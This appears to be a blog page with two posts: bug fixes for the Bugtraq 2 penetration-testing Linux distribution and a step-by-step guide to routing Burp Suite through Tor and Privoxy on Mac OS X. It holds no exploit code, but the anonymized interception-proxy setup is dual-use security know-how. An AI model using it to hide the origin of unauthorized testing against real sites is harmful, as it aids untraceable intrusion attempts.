Bug Fix : Bugtraq 2 Black Widow Final (Gnome)

Bugtraq 2 Black Widow Final builds on Ubuntu, Debian and OpenSuse. Each distribution comes with XFce, Gnome and KDE Window Manager. They all also come with 32-bit and 64-bit. A total of 18 copies that the Bugtraq Team needs to maintain.

I downloaded Ubuntu Gnome 32-bit and 64-bit version as I like Gnome Classic very much. After boot up, you need to set "Session" to "Gnome Classic" from the login screen of the Live DVD. The username is "bugtraq" and the password is "123456". The installation program is situated at "Applications -- System Tools -- Administration -- Install RELEASE" on 32-bit version. The installation program for 64-bit is on the Desktop.

The installation on my Parallels (Mac OS X Virtualization program) is smooth. I suggest you to select to download the update and 3rd party programs when install. For the first login of the installed copy, you need to set the "Session" to "Gnome Classic" and also makes it to default.

Bugtraq 2 comes with Services Administrator GUI and Databases GUI as well as Conky. However, there are some bugs on those programs. I am now going to fix it. The 2 GUI are situated at "Applications -- System Services".

I prepared a auto-run script to fix the bugs on the those programs and you can download it at here. It works well on 32-bit and 64-bit Ubuntu Gnome version.

The bugfix script is intended to fix the bugs on the Sagui and DBgui. However, it also fix some minor bugs on Conky. Be keep in mind that the official Conky is written for wireless device (wlan0) while my bugfix script is also written for wlan0. If you are using ethernet device, you need to change the "wlan0" to "eth0" (or any device that fits) on the "+.conkyrc" and "proxys.conf" scripts in the "bugtraq-2-gnome-x32-bugix" directory. Make sure you change it before running the bugfix script. In addition, the script will install some missing packages too.

WARNING : This bugfix script may damage your system or computer. You take care of the risk while using it.

Extract it with the following command :

tar -xvzf bugtraq-2-gnome-x32-bugfix.tar.gz

To run it :

cd bugtraq-2-gnome-x32-bugfix
./auto-bugfix.sh


UPDATE

The auto-run script has been updated for minor bug fix on Conky script, you can download at here



That's all! See you.

Friday, July 12, 2013

Friday, July 05, 2013

HOWTO : Burp Suite with Tor on Mac OS X 10.8.4

Step 1 :

Go to the Burp Suite official site to download the free edition.

Then save it to Documents folder.

Step 2 :

Open a terminal.

nano burpsuite_free.sh

java -jar /Users/samiux/Documents/burpsuite_free_v1.5.jar


Replace "samiux" with your user name.

Step 3 :

Go to Java official site to download Java JRE

Step 4 :

Go to Tor official website to download and install "Tor Browser Bundle for 64-Bit Mac".

Step 5 :

Go to Privoxy official site to download Privoxy 3.0.21 64 bit.pkg and install.

Step 6 :

Open a terminal.

nano /usr/local/etc/privoxy/config

Append the following lines :

forward-socks5 / 127.0.0.1:9150 .
forward 192.168.*.*/ .


Restart the Mac.

Step 7 :

Open a terminal and go to the Documents folder.

./burpsuite_free.sh

Options >> Upstream Proxy Servers >> Add >> Proxy host >> 127.0.0.1
Options >> Upstream Proxy Servers >> Add >> Proxy port >> 8118

Step 8 :

Start "TorBrowser_en-US". The TorBrowser will launch.

ToBrowser >> Preferences >> Advanced >> Connection >> Settings

Select "Manual proxy configuration:".

HTTP Proxy >> 127.0.0.1 >> Port >> 8080
SOCKS Host >> 127.0.0.1 >> Port >> 9150

Step 9 :

Make sure Burp Suite is behind the Tor my visiting cmyip.com

Remarks :

To install in Ubuntu 12.04 LTS is similar. However, the port 9150 will be port 9050.

That's all! See you.